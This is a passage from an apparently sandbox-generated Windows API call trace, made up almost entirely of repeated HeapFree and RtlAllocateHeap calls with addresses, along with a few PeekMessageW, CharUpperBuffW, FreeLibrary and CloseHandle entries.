dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0161.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0161.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0161.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0161.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0161.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0161.041] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.041] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0161.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.041] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.041] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0161.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.042] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0161.042] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0161.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0161.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0161.043] FreeLibrary (hLibModule=0x74d40000) returned 1 [0161.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.043] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.043] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0161.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.043] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0161.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0161.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0161.044] CloseHandle (hObject=0x1e8) returned 1 [0161.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0161.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0161.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0161.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0161.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0161.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0161.045] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0161.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0161.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0161.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0161.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0161.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0161.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0161.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0161.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0161.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0161.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0161.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.047] CloseHandle (hObject=0x170) returned 1 [0161.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0161.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0161.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0161.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0161.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0161.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0161.058] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0161.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0161.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0161.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0161.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0161.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0161.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0161.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0161.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0161.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0161.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0161.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0161.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0161.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0161.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0161.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0161.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0161.065] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0161.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0161.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0161.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0161.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0161.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0161.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0161.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0161.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 